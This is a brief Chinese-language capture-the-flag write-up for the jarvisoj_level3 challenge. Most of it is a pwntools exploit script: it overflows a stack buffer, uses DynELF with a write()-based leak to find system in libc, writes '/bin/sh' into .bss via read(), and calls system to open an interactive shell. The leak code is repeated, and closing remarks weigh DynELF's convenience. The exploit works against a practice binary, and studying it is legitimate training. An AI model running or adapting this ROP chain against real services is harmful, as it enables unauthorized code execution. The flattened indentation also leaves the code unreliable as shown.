题目:jarvisoj_level3
from pwn import *
context.log_level = 'debug'
io = process("/home/Kaguya/桌面/Resolve/level3")
elf=ELF("/home/Kaguya/桌面/Resolve/level3")
write_addr = elf.symbols['write']
vulner_addr = elf.symbols['vulnerable_function']
write_got = elf.got['write']
main = elf.sym['main']
read_plt = elf.symbols['read']
bss_addr = elf.bss()
padding = b'A' * ( 0x88 + 0x04 )
def leak(address):
payload = padding + p32(write_addr) + p32(main) + p32(1) + p32(address) + p32(4)
io.recvuntil(b'Input:\n')
io.send(payload)
data = io.recv(4)
return data
d = DynELF(leak, elf=ELF("/home/Kaguya/桌面/Resolve/level3"))
systemAddress = d.lookup('system', 'libc')
payload2 = padding + p32(read_plt) + p32(vulner_addr) + p32(0x0) + p32(bss_addr) + p32(0x8)
io.send(payload2)
io.send(b'/bin/sh\x00')
payload3 = padding + p32(systemAddress) + p32(0) + p32(bss_addr)
io.sendline(payload3)
io.interactive()
def leak(address):
payload = padding + p32(write_addr) + p32(main) + p32(1) + p32(address) + p32(4)
io.recvuntil(b'Input:\n')
io.send(payload)
data = io.recv(4)
return data
d = DynELF(leak, elf=ELF("/home/Kaguya/桌面/Resolve/level3"))
systemAddress = d.lookup('system', 'libc')
DynELF不能直接泄露/bin/sh的地址,因此需要使用read函数手动输入。
但是相比之下DynELF的优势是快,并且用起来简单。
实际上操作DynELF比较麻烦,也容易报错,可能是我自己的问题。
并且需要联网,不能比赛使用。
无论如何也是一种做题的方法,记一笔。